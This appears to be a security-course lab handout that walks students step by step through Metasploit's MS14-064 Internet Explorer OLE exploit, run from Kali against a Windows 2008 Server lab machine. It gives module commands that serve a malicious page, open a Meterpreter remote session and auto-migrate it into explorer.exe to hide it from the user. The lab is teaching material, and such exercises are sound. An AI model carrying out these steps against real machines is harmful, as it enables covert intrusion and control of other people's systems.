Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
http://www.rapid7.com/db/modules/exploit/windows/browser/ms14_064_ole_code_execution
Read about this attack. It's amazing--it uses a vulnerability that's been in Internet Explorer since
IE 3 on Windows 95. The Metasploit module only claims to work on Windows XP and 7, but since
it uses PowerShell, and PowerShell is included in Windows Server 2008, it works there too.
Testing Networking
Start both your Kali and Windows 2008 server machines. On your Kali machine, execute the
ifconfig command to find your IP address.
On your Windows machine, ping the Kali machine. If you don't get replies, you need to
troubleshoot your networking before proceeding.
Freeing Port 80
We plan to start a malicious server on port 80, so we need to make sure there's nothing already
listening on that port.
netstat -pant
If there's no process listening on port 80, you don't need to do anything. If port 80 is listening,
you'll see what process is listening. In the image below, apache2 is listening on port 80.
use exploit/windows/browser/ms14_064_ole_code_execution
show options
As shown below, all the options have sensible defaults--none of them require adjustment.
However, let's set the URIPATH and SRVPORT, just to make the typing easier, and to label the
screen show with your name.
On your Kali attacker, execute these commands, replacing "YOURNAME" with your own name,
without spaces:
set SRVPORT 80
exploit
Both the reverse handler and the Web server start, as shown below. Note the URL outlined in
green in the image below.
Opening the Malicious Web Page on the Target
On your Windows 2008 target machine, open Internet Explorer and open the URL shown by
Metasploit on your Kali machine, which contains your name.
If the page won't load, try refreshing it a couple times, or removing the :80 from the URL--that
worked for me, as shown below.
When the page loads, an "Information Bar" pop-up box will appear, as shown below. In that box,
click the Close button.
On your Kali machine, you should see a "Meterpreter session opened" message, as shown
below.
To see the "meterpreter>" prompt, execute this command:
sessions -i 1
Make sure the "Meterpreter session opened" message is visible, as shown above.
Save a whole-desktop screen capture with a filename of "Proj 14a from YOUR NAME".
Look at your Windows 2008 Server desktop. Internet Explorer is frozen, with a blank page. The
user won't tolerate that for long--within a few seconds, the user will probably close Internet
Explorer. For several common Metasploit modules, that breaks the meterpreter session.
The Meterpreter seesion is still working! To see why, at the "meterpreter>" prompt, execute this
command:
getpid
You see the process ID of the process Metasploit is using on the target machine, as shown
below. Your PID will be different from mine.
To see what this process is, on your Windows 2008 Server desktop, at the bottom of the screen,
right-click the teskbar and click "Task Manager", as shown below.
In Task Manager, click View, "Select Columns...". In the Select Process Page Columns box, check
"PID (Process Identifier)", as shown below.
Click OK.
In Task Manager, expand the width of the new column so you can see the PID header.
Click the PID header to sort by PID and find the PID you saw in meterpreter.
This particular exploit does not work by injecting code into the running iexplore.exe process. It
starts a new "ApacheBench Command Line" process with a name composed of random letters,
as shown below.
In Task Manager, click the ApacheBench process to select it, as shown above. At the lower right,
click the "End Process" button.
A box pops up asking "Do you want to end this process?" Click the "End process" button.
We need to stop the currently running Web server so we can change the malware it hands out.
jobs
You see one job running, with Id=0, as shown below.
kill 0
Automatic Migration
We want to automatically migrate the session to a normal process, so the user won't notice
anything unusual in Task Manager.
exploit
On your Windows 2008 Server machine, open Internet Explorer. Open the URL specified by
Metsploit, and close the "Information Bar" box.
A session opens, the migrate script runs, and the session automatically migrates to another
process, as shown below.
Saving the Screen Image
Make sure the "processing AutoRunScript 'migrate -n explorer.exe'" message is visible, as shown
above.
Save a whole-desktop screen capture with a filename of "Proj 14b from YOUR NAME".
On the Windows 2008 Server machine, close Internet Explorer. At the bottom of the screen,
right-click the teskbar and click "Task Manager".
In Task Manager, find the PID you saw in meterpreter. That process is "explorer.exe", as shown
below.
This is a good process to use, because it won't be closed until the user logs off.